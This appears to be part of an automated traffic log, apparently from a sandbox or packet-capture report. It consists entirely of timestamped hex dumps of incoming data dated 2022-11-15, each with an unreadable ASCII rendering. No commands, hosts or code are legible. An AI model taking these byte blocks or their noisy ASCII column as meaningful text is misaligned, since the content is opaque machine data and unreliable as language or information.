                                                                                                                                                  2022-11-15 17:54:38 UTC2891INData Raw: e5 2a 02 37 c9 dc 36 46 a3 76 80 5e 28 8d 87 14 0d f8 dc c5 2d 1c 2d ac 3f 39 02 78 e1 4f b3 d8 4a 80 eb 97 38 09 5e ce e6 cd 78 c2 1e c2 fb c3 f7 89 18 19 1f c6 61 a9 7b c2 68 c7 5d b2 fc dc 98 62 8b 1b 56 aa c0 ea 08 1a 9c 95 ec 7e b7 c1 7a 35 6a 2d b6 bf 47 aa 0e 0f bc 7d 64 30 25 04 ef 8a 0b bf 8b 62 5b 8e 48 22 19 b5 c4 04 95 77 88 ae ce 4f 00 bb 4e 21 d6 2e a2 f7 db 38 a5 7e b0 65 18 b8 58 b2 07 79 ef 05 c3 9c 2d 13 28 8a ef 88 0c 50 5b 31 4a fe f3 54 1a b3 96 40 f6 6a c7 c7 a8 b8 2c 1f 48 c2 ce 1c 71 bb 42 bb 0a 7c 14 52 55 a4 bc 1c 8b f6 5e c5 31 8b ed 41 91 26 26 4e b0 38 c7 4b 1c b2 cf df 2a 28 58 eb 0d c2 ff 09 cf d1 e2 bc 4e 8d af fa 55 c5 50 05 89 ca 8b fb 72 ba ce 79 87 8d 05 16 2f 6b 83 eb d7 fa ea 12 5f 7c 19 c9 73 8a 25 d4 14 96 ba 8b 23
                                                                                                                                                  Data Ascii: *76Fv^(--?9xOJ8^xa{h]bV~z5j-G}d0%b[H"wON!.8~eXy-(P[1JT@j,HqB|RU^1A&&N8K*(XNUPry/k_|s%#
                                                                                                                                                  2022-11-15 17:54:38 UTC2907INData Raw: 05 d5 c5 04 89 28 18 54 fc e5 c7 aa cb dd 41 88 78 57 b4 65 f2 84 59 ab 62 ce b9 6e 21 d4 4d 5d d3 fb 56 1f e8 5b ce d3 42 f8 09 f1 ff b1 7b d0 e3 d5 fb d8 81 ef b7 6c d2 9d 16 90 13 09 f0 0d a8 4a a5 65 05 53 e9 8c 9b eb b7 4c 73 d2 cb ad 13 d1 d5 58 26 b0 c1 29 cf a9 28 31 ff b2 d9 fd cc 6d 07 ee 6e 90 1d 51 c5 cf aa ca 2b 45 8b 2b ca 96 5b 9c bc d0 f4 ff 99 c0 89 21 31 7e b6 53 d2 c7 e6 2a d2 a0 63 0a ef ec 47 01 f2 23 c3 09 95 56 76 fa 0f d1 32 6b cb f5 85 64 f9 d2 c8 e1 5f 73 23 9a 8b 86 fd cc 78 97 c5 ef af e6 1a 17 31 f1 8b a9 1e 3f cb 7e 95 45 0e a0 a5 8c 38 f2 10 29 ff e6 8e 69 5b a9 01 30 f5 e4 06 76 7b b2 ec d3 e2 80 e4 b8 dc a0 38 2f 8e 49 4a 92 89 31 a9 26 ff 4c 30 70 be b1 4c 68 a4 12 ea bc 8c e2 28 10 eb 24 ae 7d 95 d0 08 95 f1 6f c5 c3 8b
                                                                                                                                                  Data Ascii: (TAxWeYbn!M]V[B{lJeSLsX&)(1mnQ+E+[!1~S*cG#Vv2kd_s#x1?~E8)i[0v{8/IJ1&L0pLh($}o
                                                                                                                                                  2022-11-15 17:54:38 UTC2923INData Raw: 01 d3 7a 8b 09 f0 b1 2c 33 2a 31 3d 29 c8 2a 28 2d d9 95 c4 81 9d 56 3f e9 0b 47 94 7c 5c 8b bf 30 c9 4e 31 c7 21 4f f9 60 7d 1a ff e6 70 3d 00 8c 7c 55 9b 22 79 78 63 17 29 2e 0b a2 77 0c 5c df 50 0d 92 4e 1a e2 2a 0c 6d bc 43 10 c2 7d 99 c2 4c 42 76 6c 5e 81 81 79 37 08 a8 9d 84 11 98 b2 10 81 59 d5 6d 21 de 81 16 8a 65 5d 3a 75 20 75 f2 60 29 16 99 f9 51 e4 1a 2a 44 20 75 77 04 d9 65 17 a1 33 3a ca 1e 63 10 d9 a2 d4 b8 65 81 fc a8 17 5a 9f 10 57 8e fb b3 84 39 20 e8 48 80 e0 22 5f 6f b5 f2 f7 61 83 14 3f a4 12 2f ce a9 88 98 b0 0c f6 05 13 af 1e af 48 55 79 04 c6 24 40 0e bc 30 24 dc 1c 7a b8 d1 2f 80 1e 64 79 00 c5 11 41 8b 7f 26 c9 f6 4f 16 b0 37 29 5b 2b 80 99 02 f8 5e c3 e0 49 17 5f d8 d6 73 4e 95 75 b4 f9 70 08 e1 12 0e 31 01 71 75 60 ed 09 d3 2e
                                                                                                                                                  Data Ascii: z,3*1=)*(-V?G|\0N1!O`}p=|U"yxc).w\PN*mC}LBvl^y7Ym!e]:u u`)Q*D uwe3:ceZW9 H"_oa?/HUy$@0$z/dyA&O7)[+^I_sNup1qu`.
                                                                                                                                                  2022-11-15 17:54:38 UTC2939INData Raw: e1 7f ee a1 53 b9 e2 11 ca 40 24 31 cd 82 34 f6 0c 2e 75 f1 b9 45 c2 34 c5 ae f6 53 16 01 de 16 bb ea 36 3f 44 e4 c9 04 29 d2 31 d9 b9 bb f7 af 5a bf 23 6e 8b 81 29 fa 26 be 29 05 9b 88 c2 01 ba 09 da 8b 30 74 61 cb ff 96 10 21 ea b8 94 f1 12 07 09 d9 29 cf 45 d8 bb e3 52 00 32 ff e3 a4 e9 43 70 70 18 ea 20 25 ee 15 55 31 9b f6 7b a2 f2 95 b0 99 7e 2d 52 5b c0 f5 4e c5 84 d8 f5 41 05 21 f7 3a bb 62 de 05 46 68 fe 01 84 ed 26 0c 29 32 0f 21 f4 ac 05 51 b8 48 8f 29 2e c8 33 0a b9 2c ff ae c7 03 d9 d7 f8 f8 bd 73 a5 0b eb 25 df 96 96 f7 c1 08 32 26 93 61 20 f7 20 11 29 33 63 70 6b 54 f7 e6 e9 93 b2 16 1f 38 eb 0b 39 64 8e ad 38 f6 d9 62 29 c7 55 53 b1 3b 15 f2 01 2d 93 ae 83 bf 43 a3 86 e5 29 b5 14 e9 71 ce 09 cf 7b b2 42 8a aa b9 6c 17 0d 4c 28 77 c9 37 82
                                                                                                                                                  Data Ascii: S@$14.uE4S6?D)1Z#n)&)0ta!)ER2Cpp %U1{~-R[NA!:bFh&)2!QH).3,s%2&a )3cpkT89d8b)US;-C)q{BlL(w7
                                                                                                                                                  2022-11-15 17:54:38 UTC2955INData Raw: 98 f1 e6 40 9b 50 17 ea 64 88 af 12 e3 a2 69 93 a5 a8 26 49 58 c9 00 0a b8 44 93 5a 32 bf a2 05 d7 09 da dd 70 f3 bf 94 bc 39 09 39 16 03 21 c5 fd 85 79 65 7e fa 14 af 60 4e 9d af 26 76 5e 52 33 fe b2 14 95 04 c8 13 a4 06 13 20 38 ed e9 97 19 4b 3e 3e 35 06 fa a3 8e 2d 35 dd 94 d1 f7 6b 8b 3a 14 33 3e 3a 87 29 f9 25 d9 f9 f9 74 ec b9 9f 96 7e 25 c2 67 39 86 ba 2f df a4 4f f6 a0 27 e8 5f e4 22 97 73 a6 13 01 2d 5a 10 24 21 f9 31 2d 38 89 54 d6 a5 d3 41 ac 82 44 28 b9 2c d6 12 e5 e3 b0 17 25 24 31 cf 01 d0 2e 35 56 ef f5 3b 7e 8c 09 c0 97 b2 1a d5 91 58 25 26 cc 2e 89 8b 69 7c 14 90 39 22 16 24 09 c1 0c 02 54 68 c2 66 59 c7 09 31 d1 7e 0f 64 c6 be dc 7c 28 91 aa 49 5c bd 51 aa 15 ea c4 05 ea f9 38 a5 b5 ed 7e f9 27 e3 07 de 4b 5c 01 1e 60 c5 9c 25 5b 64 24
                                                                                                                                                  Data Ascii: @Pdi&IXDZ2p99!ye~`N&v^R3 8K>>5-5k:3>:)%t~%g9/O'_"s-Z$!1-8TAD(,%$1.5V;~X%&.i|9"$ThfY1~d|(I\Q8~'K\`%[d$
                                                                                                                                                  2022-11-15 17:54:38 UTC2971INData Raw: ee 0b 0f 9e d0 c1 1e 39 0a 66 2f 5a a0 0c eb bc 48 2d e5 9c 14 c3 87 88 05 92 80 f2 9b 13 21 c9 af 62 cf c1 de 42 12 f0 ef 60 35 eb 13 a5 2f 4d 3c d3 e8 05 f8 31 c1 37 fc 9e e4 89 ea ea 9d 91 6a 8c e2 31 fb 37 cf 2a e6 06 5f ef 35 b4 aa 45 f6 3a 84 dd b3 7a b5 96 2a dc a3 b8 b5 54 fd 50 31 1a bf 6e 35 b5 f6 22 59 e1 54 0c bc 18 96 ea 8b 48 09 b3 07 be 76 52 5a 4a df 47 9d 25 51 51 8b 20 1a db e2 1c fb 93 d3 ea f5 d2 a5 2c 16 82 2b f3 40 47 2c d9 62 31 f3 ec 5e bd 00 1f fe 21 d6 05 4a 06 a6 d1 5b b8 3c 4a e2 7f 92 88 6e 8b 4a 09 9d b4 05 a6 ec 33 b7 08 ad 76 b4 13 fe 30 51 35 11 47 2c b0 2d 2d c2 31 cb fc b3 eb 70 cc 95 e5 77 2d 76 e9 70 09 07 4f 25 ab ca 42 1c 31 db 96 f6 b8 1d d7 16 09 fd 56 8b c7 f1 71 8b 01 c1 7d bb 26 d3 f3 e0 fe 8b 31 b7 f3 88 09 cb
                                                                                                                                                  Data Ascii: 9f/ZH-!bB`5/M<17j17*_5E:z*TP1n5"YTHvRZJG%QQ ,+@G,b1^!J[<JnJ3v0Q5G,--1pw-vpO%B1Vq}&1
                                                                                                                                                  2022-11-15 17:54:38 UTC2987INData Raw: 2c 33 1f 24 a5 ee 22 9d df 16 aa 25 f2 20 94 96 b7 90 aa 21 fa 27 03 1f e4 61 2c 31 d6 5d c9 d2 75 bd f1 48 cb d7 62 6f 32 2c 77 6c f1 72 ee 9f 09 3b d7 14 27 58 25 0e e7 65 2e 21 ff 21 d7 3a ee 74 e5 c4 a9 ab 61 eb ea 1c 2b 8b f7 10 c6 6b 83 c2 31 c7 a1 1e be 7a 8b ee 4c 58 34 09 63 aa 31 06 31 d8 6a 99 15 02 f5 e9 57 65 5d 01 21 cf 62 f0 6a 6a 75 9d f8 db d7 12 9e 58 76 26 f2 f3 0b 1d c4 3c 09 d7 ee fb c0 8f 0b 5e c5 4d 6b 9d 76 d8 d3 c2 06 75 45 7b a3 2a 3b 02 2b 52 f4 75 1f b0 18 8b 1a 97 16 68 bf d0 32 86 c5 4b f7 b8 bf de 13 de e9 8d 89 f7 5c 11 c2 ea 28 22 89 d0 41 c2 ba 09 4c e7 31 13 c2 21 da ae f7 7a 55 4b 2a dd ce 3e c4 28 1e 91 af 45 37 96 e7 af 8a 04 58 ac a2 f2 77 7c 45 e0 31 d1 29 c7 a0 b2 89 f3 97 79 5c ad 70 97 fd 3f b2 e9 d1 3f 17 31 f1
                                                                                                                                                  Data Ascii: ,3$"% !'a,1]uHbo2,wlr;'X%e.!!:ta+k1zLX4c11jWe]!bjjuXv&<^MkvuE{*;+Ruh2K\("AL1!zUK*>(E7Xw|E1)y\p??1
                                                                                                                                                  2022-11-15 17:54:38 UTC3003INData Raw: 9d 01 ca 9d 02 56 cf 24 7c b2 e9 a9 a4 53 b6 c4 e6 fb 8b ac 4b cd dd 54 0c bb ed 0f 2d ce 96 e2 9b 38 08 c3 b8 8a 29 ce 32 4b f8 52 5b da f9 5e d0 8d 85 05 02 cb cb 04 31 f7 29 fa ff 53 78 ff ca e9 5f 13 82 ca 4c 14 f2 20 51 05 79 e3 d6 4e d9 13 7e ed f4 7a 9d 96 4f b7 32 65 18 bd 21 01 d2 76 f2 bd 96 54 a7 60 a2 ba f7 f3 af 27 10 59 31 df 29 01 c3 57 3d 09 ce 8b 03 c6 1b 17 89 d2 b9 32 45 c1 d5 94 0c 4a e9 ee 32 2a e6 f5 1a 56 f1 5b 25 66 a2 24 c2 0b f3 72 75 98 a3 d7 be 5a 01 32 7c ce ff 1c 20 d6 02 aa 99 f3 7a 32 66 ef dd c1 d7 e6 2e eb 2d b1 6b dc dd e0 70 50 1d 10 39 fe c0 59 62 e5 05 7b c9 31 b4 2b 62 3e 43 c0 4f 1c ce 73 3d 00 f8 17 51 a6 77 12 dd 66 f9 aa 46 b4 78 df 48 6f 43 2d 87 ad fd 82 b7 0e d7 b3 38 db df 06 4a dc e8 32 db 3e 0b 81 f0 97 20
                                                                                                                                                  Data Ascii: V$|SKT-8)2KR[^1)Sx_L QyN~zO2e!vT`'Y1)W=2EJ2*V[%f$ruZ2| z2f.-kpP9Yb{1+b>COs=QwfFxHoC-8J2>
                                                                                                                                                  2022-11-15 17:54:38 UTC3019INData Raw: 2b d2 fa 8b bb 38 03 cb 8a 73 4a 94 d2 bf 66 dc 2d fd 23 17 27 29 d5 32 f2 f1 17 1c 01 6f 7e 77 c5 e6 34 5e f8 bf 93 af 8f 7f 04 23 16 95 8d ec 08 59 f0 c4 c7 6b e9 87 dd 14 d6 d0 c5 31 07 99 e9 3a 35 4d ef 49 be cf 57 f1 d3 4b 5b d4 13 06 61 18 01 fe 2c fa 25 f2 f7 e5 5f 86 29 f3 8b 2a 7b de 4e 23 dd ab 7f b1 3c 3e d8 32 c6 bd 3a ab 71 2b 9f e2 66 d9 72 73 91 25 55 94 f9 8a bc c5 f4 af ec 17 b1 41 92 35 af 2d 79 3e f0 a5 c6 56 67 66 13 35 24 e2 8e 93 cd 6a 28 b2 48 cf 2f fe 7e da cb 70 66 99 a3 42 31 38 5e 0e 25 45 a4 a5 d6 4f 23 68 09 2d 24 4e dd 02 81 31 04 05 17 42 8b da 5f 32 6d 75 98 65 e8 09 4e c3 fe 67 d9 6b 51 3f 42 05 89 ec d5 52 e9 c0 4f ed d1 20 95 91 00 89 c6 bb d7 46 53 1d 23 9d 39 90 f1 85 21 fb 47 5c 01 db 94 cb bb e6 fb 53 f0 4f 0b 6f f1
                                                                                                                                                  Data Ascii: +8sJf-#')2o~w4^#Yk1:5MIWK[a,%_)*{N#<>2:q+frs%UA5-y>Vgf5$j(H/~pfB18^%EO#h-$N1B_2mueNgkQ?BRO FS#9!G\SOo
                                                                                                                                                  2022-11-15 17:54:38 UTC3035INData Raw: ad 06 59 9c 99 13 cb 20 9d a4 7a a2 fb 96 a6 6a 4f bb 70 c1 8a 13 05 5e 0a 74 e0 fa 9f b3 25 13 18 53 01 ea 0a 5e 89 32 e9 63 3c 4b b9 4b 96 2c 86 07 0b 44 a6 87 2b 5d 16 1a 03 f5 24 15 31 09 f7 9d b6 70 43 db 17 89 f1 ab 76 3a 14 4b 01 b6 58 4b e1 c4 3a 29 8a 92 2a df 4b a9 f7 dc 21 7b 4b 0a ef 8b 2a 5a e6 f3 15 cf 28 c5 d6 d9 36 7f fc 51 c9 40 4e 69 58 8b c0 a1 c2 01 2e 8b d5 4b fd ea c4 21 ca e9 3a 09 ee 31 fa 76 e5 c4 c1 ba a2 a4 93 ed 89 8b d1 02 a8 21 ff 7f 8a 5d 33 01 f3 b2 57 0d 11 2b 98 9b 40 95 4c 19 bf 5e 7a 52 de 19 c4 d9 85 87 e3 11 78 2d 1e bf 55 3a 31 ee 30 4e 28 8a 38 05 31 d9 21 f2 64 aa 16 fc a8 d6 d2 be 82 82 f7 f5 e5 60 25 f5 09 fd 9c 08 5a f1 ae 34 44 aa 99 bf 31 a5 25 6a 72 1c df d3 c2 fa 62 8f cb fe 46 29 fd 65 8b bb d4 56 ee f9 7e
                                                                                                                                                  Data Ascii: Y zjOp^t%S^2c<KK,D+]$1pCv:KXK:)*K!{K*Z(6Q@NiX.K!:1v!]3W+@L^zRx-U:10N(81!d`%Z4D1%jrbF)eV~
                                                                                                                                                  2022-11-15 17:54:38 UTC3051INData Raw: 52 8b 76 fc 7a 59 28 3a 45 80 e6 1f b2 60 c4 31 f6 ab 8a 43 4a 32 5e cb b2 89 77 1a 7f 56 fd 4b 09 6a 64 38 2d 81 eb 55 94 20 a2 88 10 5b 29 fa b5 74 e5 52 d9 fe a5 d7 4e 7c 2f 03 07 f4 5f eb 57 c6 46 b5 99 fe e6 38 75 b1 09 cb cb 17 48 c3 1c dc 20 c1 4f e0 ab 34 e2 53 5a ae 02 a3 11 31 fb 77 7c f8 e4 cb bf ec 52 b4 af 12 5a be 28 35 f6 4b b8 ee ca 47 51 c0 18 bd 0d 97 dd 1c fc d0 31 bc 25 cb 54 7d c9 59 c8 02 8b 0f 25 40 db 63 2d f4 04 50 c3 80 b7 1a 6c de aa 59 ef 2b ae 79 97 32 86 9c 96 13 e3 f6 4a fa c2 7a ee 5f 7e 21 c4 2b 5f 13 c2 63 66 f7 ca f9 e5 3b 07 31 d0 bb d9 fb 13 11 0a 0b 0f b6 02 7e 54 51 e3 2b b8 30 a2 03 84 f8 f1 ba 62 9f f3 12 5d 5c 27 71 21 3b 98 a8 31 17 df 2b 02 ae 62 ed eb f5 58 36 95 51 94 6b 74 57 64 03 fa bc 60 c9 ee 78 29 5a c6
                                                                                                                                                  Data Ascii: RvzY(:E`1CJ2^wVKjd8-U [)tRN|/_WF8uH O4SZ1w|RZ(5KGQ1%T}Y%@c-PlY+y2Jz_~!+_cf;1~TQ+0b]\'q!;1+bX6QktWd`x)Z
                                                                                                                                                  2022-11-15 17:54:38 UTC3067INData Raw: f9 df 04 f1 c7 e8 52 d6 eb 5a 28 3b 5f 71 ab e8 eb 28 0b 91 1c 42 ca 28 11 0c 2a 70 e0 89 f6 8b 4e 38 fc da e2 e3 b2 0c d9 92 89 21 c7 dd f3 e2 a5 91 65 2d 23 49 4a ad 86 13 c6 0e ad 00 93 34 fb ff 99 a1 ef 4c 7d 0f 5d 4c df d3 cb ae 8e a4 4e e3 ff 1d fa 21 e4 52 3b 2f d2 14 b0 7e f6 4b d6 35 c9 bb c5 a4 8e 62 7e 48 cb cc 5e 35 32 ae a2 e2 24 02 f2 cd 6c 7f 0b a4 c6 5c a4 59 c3 7e bc 65 a4 ae 34 fb a8 34 17 c6 28 2c 27 2b 09 76 7d 4a 61 7e 64 53 a4 52 ef c0 ff 84 0f 86 4a 13 8a 60 02 2d 17 34 2e 7a 5e c6 62 29 ff 76 60 c9 dd 9b 0d e4 ab ac 43 e5 95 61 fb e7 28 92 ef 69 ba 2a b3 ba 92 e2 8f 02 2b 80 6a f6 57 75 fe 08 5a fd 4e 84 9d 1a 04 5d 5e 6c 5a 7f 93 f2 8a cf 57 4f 65 34 50 ae e9 f9 8a 37 45 c8 39 99 2b 1f 8b 2a f6 3a 5a a2 33 19 03 37 86 38 3f 52 27
                                                                                                                                                  Data Ascii: RZ(;_q(B(*pN8!e-#IJ4L}]LN!R;/~K5b~H^52$l\Y~e44(,'+v}Ja~dSRJ`-4.z^b)v`Ca(i*+jWuZN]^lZWOe4P7E9+*:Z378?R'
                                                                                                                                                  2022-11-15 17:54:38 UTC3083INData Raw: 10 78 f6 04 31 2b 83 61 68 9a e5 2c 17 48 64 0b 89 a3 c4 ca 9c c1 60 02 db 31 1a 62 22 5a a6 79 8e 1b 17 cc 03 ef 2f 5a be 57 94 d8 5e fe ba 31 31 89 d3 3b 34 02 d9 58 3f 32 9b f7 5d b1 94 d3 63 a0 5b 87 61 2e 8b f7 0f 7a 0b da d5 66 5e b7 73 76 27 f8 d1 be ac e9 b2 89 d7 50 f2 25 ea 04 c5 d7 12 d2 fb b7 e4 12 e2 80 34 71 44 4e 01 d3 ff d8 88 ce bf 42 e7 c2 2b 54 23 52 75 6e 8c b6 2d 24 1c 59 29 f2 ce 63 f1 2e a8 b9 d2 bd 56 96 11 1b e2 9f a8 25 2f 09 d2 b0 73 f0 be 4a 0a b2 fd 8b c2 d1 2d 6b ca 6b f5 ee 86 b7 b0 8c 01 ce ef c2 fb f5 bd 4e a8 4e a1 29 08 6b 84 4a 0b 9e f3 75 e5 0c 92 e1 fb b3 fc 2f f6 d7 9a d1 a9 ee fb 47 af 5e 66 09 f2 bb 32 08 57 14 96 26 01 cf 2b 2f fc 5f cb d1 b5 95 cb 0c 21 f3 a5 d6 1e cb d5 b2 68 c1 cc f8 af ac f4 61 59 25 7a a8 a5
                                                                                                                                                  Data Ascii: x1+ah,Hd`1b"Zy/ZW^11;4X?2]c[a.zf^sv'P%4qDNB+T#Run-$Y)c.V%/sJ-kkNN)kJu/G^f2W&+/_!haY%z
                                                                                                                                                  2022-11-15 17:54:38 UTC3099INData Raw: 8b e2 21 f0 d6 61 62 2d 20 7b a2 ac 13 60 66 29 17 bf 93 9f 25 75 c5 f3 27 d4 ed 09 ea 80 59 93 62 c3 24 2a b5 2f 74 55 65 ea 8c bd c6 4b 10 cc 6b cb 95 d6 1d e2 01 c2 7f 0b da 71 8e 89 29 c3 56 75 cb dd 1b 96 5b b2 ef 32 4f c1 1a dc b7 c4 04 ac 22 a1 33 3e 6e e6 68 02 ee 21 f3 25 24 b3 50 f2 d0 57 f4 6b c9 64 81 5b 3e c8 95 29 0e c1 31 fb 01 96 e6 4f 4f ea 64 61 b8 1a 47 57 4b 21 2a 89 c2 2a 84 f4 a2 f4 91 53 13 01 3e b8 55 a2 c6 76 d4 51 21 2f ba 33 6e 26 f1 42 19 3b e5 e4 4a 18 4a a1 8d 3a ce 09 0d 31 d0 66 7c 8b 30 34 f3 dd 6f 62 a3 10 24 b7 25 c3 e5 e5 ac 84 c4 c1 67 4f 21 eb 3d 9d 99 02 80 97 72 5c 6e 48 fb c0 60 b9 5a 0c 84 03 fe 75 4c fe ca 7a 4e 85 ec b3 27 7f a1 27 29 fe dd 31 30 e8 28 fd 13 52 44 fa 58 df 04 29 10 b7 51 0c a0 21 97 e6 0a 05 0a
                                                                                                                                                  Data Ascii: !ab- {`f)%u'Yb$*/tUeKkq)Vu[2O"3>nh!%$PWkd[>)1OOdaGWK!**S>UvQ!/3n&B;JJ:1f|04ob$%gO!=r\nH`ZuLzN'')10(RDX)Q!
                                                                                                                                                  2022-11-15 17:54:38 UTC3115INData Raw: e1 29 56 d2 e9 6f 0a ef 88 1f 1b 85 21 c0 0d a8 fa d7 bf 4a ff 35 31 c9 75 32 3f 29 0c 46 e2 4b 05 ea 72 0e 35 df 46 23 14 19 01 f0 94 4c 97 12 8b 3b 12 81 ba ca 27 4a cc 60 5b 95 4e 86 45 0b f1 2b 41 3a e9 1a c2 b4 24 f8 03 bf 5c c4 5a 61 b0 ee 72 be c8 c6 c9 5c 5a 12 e9 ff d8 51 13 95 cc 6b 92 ea 61 33 ee d7 9c 39 2e 01 43 96 74 13 3d 3b a9 ab b3 08 87 08 c6 5f 29 9f cd 46 27 f0 58 95 d4 ee c9 5d 39 cc f3 2b 65 a0 c5 39 ae 8b 0a 5e d8 6d 0a 09 71 f6 5b 18 d3 ab 8b 21 0e 79 22 68 18 ad 58 44 97 5d 1c 28 c9 a2 30 fb 15 a3 29 33 c2 09 e5 eb b2 6c 45 0e 30 dd 03 0b 2a ef b3 79 e5 be 01 31 f4 a7 82 45 3f e8 be a0 da 4a b9 4a 28 8c 07 b1 9d 58 b0 96 84 25 71 d1 6c ba b9 9f bb c8 92 7f ba e9 f1 2c 27 f8 44 2b e1 40 e2 a5 2a 8c ec c2 09 fa d6 fa cf 24 21 c6 bc
                                                                                                                                                  Data Ascii: )Vo!J51u2?)FKr5F#L;'J`[NE+A:$\Zar\ZQka39.Ct=;_)F'X]9+e9^mq[!y"hXD](0)3lE0*y1E?JJ(X%ql,'D+@*$!
                                                                                                                                                  2022-11-15 17:54:38 UTC3131INData Raw: ea 31 f2 03 11 6e 99 c9 2f 81 c2 e1 1f 6b 2c 0a f7 b7 46 c8 84 a4 24 33 16 d3 a5 fe 19 2e 5a 69 df 51 8a 62 09 16 f7 89 56 f1 bf 4b 4e d6 25 09 f1 74 84 01 36 83 48 f3 7b a5 24 f5 62 d6 5e 5f 52 f7 1a fe c0 79 16 01 4a fe a6 5b 4b eb 74 62 0b 06 c9 57 b6 58 94 9a 44 c9 bd fe 97 84 67 84 1f dc ba c9 97 ff 94 b3 4a 2d ef ca 05 12 03 3b e7 d8 4a bb cd c5 31 ca 7c 48 b2 3b 76 13 c9 b8 fd 29 3b 25 0d 20 f1 c3 89 ee 25 d6 31 5a d6 df 60 0e 1e ab 27 4b 6f fc 01 d1 f6 2f c9 9a 8a 57 89 6b d1 49 4b 72 75 9f d0 04 5b 0a 8c 5d cb 9f db 9d a5 77 b1 b5 c3 6f 2c 61 21 4e c9 cb b9 4e 94 57 d4 18 e2 47 91 cb 9f ae 66 64 3b e1 95 6e f2 fa c4 03 19 fc ce 85 31 38 eb a2 03 a2 1a b2 24 40 82 09 ff bf 4c e2 5b ee b6 a9 24 ea 69 2e 91 52 57 6c 23 49 c7 77 92 16 d2 65 e5 fc 9b
                                                                                                                                                  Data Ascii: 1n/k,F$3.ZiQbVKN%t6H{$b^_RyJ[KtbWXDgJ-;J1|H;v);% %1Z`'Ko/WkIKru[]wo,a!NNWGfd;n18$@L[$i.RWl#Iwe
                                                                                                                                                  2022-11-15 17:54:38 UTC3147INData Raw: 2e da 52 cc 63 97 02 c4 ef 1c 6e 13 f1 7b 71 9b 89 fa 32 38 8b 0e 65 1c ad ca 08 57 fe dc 72 d8 6e b3 82 2d 71 11 93 e8 bf e1 47 2f aa 28 e2 05 95 fc fe eb 60 2e ea 1c bc 03 52 23 33 2b 30 04 5e 29 ff 09 da fa 34 ee c4 f3 8e f4 25 f2 5f c5 58 34 4a ae 66 a4 1e bd d9 77 69 39 2b 04 10 29 fa 01 ca 8e d1 a3 27 5f c7 98 3f 03 29 33 2f 31 45 e2 ca ff 45 d9 97 e9 b3 35 12 0d 04 f3 11 5b f3 10 05 19 80 fb fa bf e2 55 17 31 d2 a3 7d 5b af 30 9e 88 f1 b1 58 6b fd 72 6b c0 08 d4 9f ed 3e 7c bf b4 ef 8c e5 f2 4a 04 b2 e3 91 36 40 c9 21 5f d8 bc a5 7c 09 2e 48 8e 32 66 eb 4a 20 8d 4e 2b a6 16 94 2e 5f ee 64 65 fe 4b 30 80 c5 42 90 ca c9 e9 78 25 b0 34 85 65 26 fc 62 09 ca e8 5c 31 d7 a8 7d 0d 1f b9 77 84 c1 43 9a af f9 6d 97 bf 8b e5 25 e9 59 65 0b f7 19 e2 b1 54 0e
                                                                                                                                                  Data Ascii: .Rcn{q28eWrn-qG/(`.R#3+0^)4%_X4Jfwi9+)'_?)3/1EE5[U1}[0Xkrk>|J6@!_|.H2fJ N+._deK0Bx%4e&b\1}wCm%YeT
                                                                                                                                                  2022-11-15 17:54:38 UTC3163INData Raw: 7d 2f ac a6 f3 14 1d 60 a6 05 97 6b 7d 27 00 e8 55 d8 f2 08 eb 66 16 5e 07 00 21 38 70 8d 0e 8a 18 5e fb 50 48 e3 ed 70 18 70 95 16 d1 37 e8 e4 e3 c6 48 1d 3d 9c 0d a2 cf 1a d3 98 14 e8 19 e0 c7 1c 5a fc ff 82 e9 9b cb be 7f d9 ef 42 89 da 4c 21 b5 52 50 bf d1 f0 49 f7 51 ef 6a 9c af 45 96 29 23 a8 a6 bf 43 c0 d2 80 65 6e 88 c1 0d ba 25 04 f3 80 8b 09 cf d6 8a 69 8b d6 55 89 66 7e 7d c3 f7 31 94 eb d9 de ed de 7d 66 85 f0 33 fd 99 48 c2 58 f7 b5 eb e1 29 28 65 d3 82 5b f6 5f f1 bf 49 5b 3e 12 ef ee 2c 90 01 55 c2 bf 6a 71 ab 29 19 f6 5d 67 16 13 ca eb e2 c4 92 12 91 b7 91 4b ba 28 3f 81 3c 0f f8 12 d9 1d e3 2c 4f c4 66 27 18 58 a7 51 f4 26 1b 09 29 1f 71 a6 ad 7c 7f 65 c6 92 dd fe 71 32 2d 73 ec 27 09 a5 59 fc 4b 79 da bd 25 f8 5d 3e 24 95 f5 38 86 31 01
                                                                                                                                                  Data Ascii: }/`k}'Uf^!8p^PHpp7H=ZBL!RPIQjE)#Cen%iUf~}1}f3HX)(e[_I[>,Ujq)]gK(?<,Of'XQ&)q|eq2-s'YKy%]>$81
                                                                                                                                                  2022-11-15 17:54:38 UTC3179INData Raw: 5c 25 52 99 0b f5 0f 86 19 c6 d2 05 f7 3d 3f e8 5c 64 9b fa 65 e8 e2 5b 9a 7a 59 bf 8b 01 d0 5f 09 a9 ee 69 95 e6 dd 60 66 f2 bb d7 38 54 4e 7e 28 86 19 b4 10 79 0f 15 ff 99 62 d1 d9 02 e3 89 2a e5 35 4e 10 a2 59 7d 91 84 c2 73 fb 02 0a 54 a9 94 19 59 44 65 13 4b 49 3b 48 7e 09 fe 95 db 3f eb 55 1e ac f5 af 3c d8 33 2d 29 f0 7b 81 17 f8 f0 78 c6 97 5d 89 5b 54 78 c9 7d 18 4d c1 02 97 14 1a 16 0f b6 01 ec 77 b4 aa d9 89 73 12 12 ba 0a ec d9 b4 ae ac a6 8f ff c9 c3 77 ee 26 6e 09 a4 4a 80 72 b4 1f ca 01 5e 8c 10 bb 9b 83 2d 9a f6 75 32 4d 77 71 33 40 89 d1 21 da a9 a7 d3 d9 d7 05 e0 9b f7 bd 76 e3 5a 75 99 ed fa 3f 82 11 01 df 79 59 a7 d6 a9 c2 21 ce 53 6d 16 e3 32 1d c3 ce 75 05 37 bd f8 7e 52 ae b6 29 12 21 f6 fa 99 2e 3c 53 89 d1 7f 32 76 76 46 65 f1 af
                                                                                                                                                  Data Ascii: \%R=?\de[zY_i`f8TN~(yb*5NY}sTYDeKI;H~?U<3-){x][Tx}Mwsw&nJr^-u2Mwq3@!vZu?yY!Sm2u7~R)!.<S2vvFe
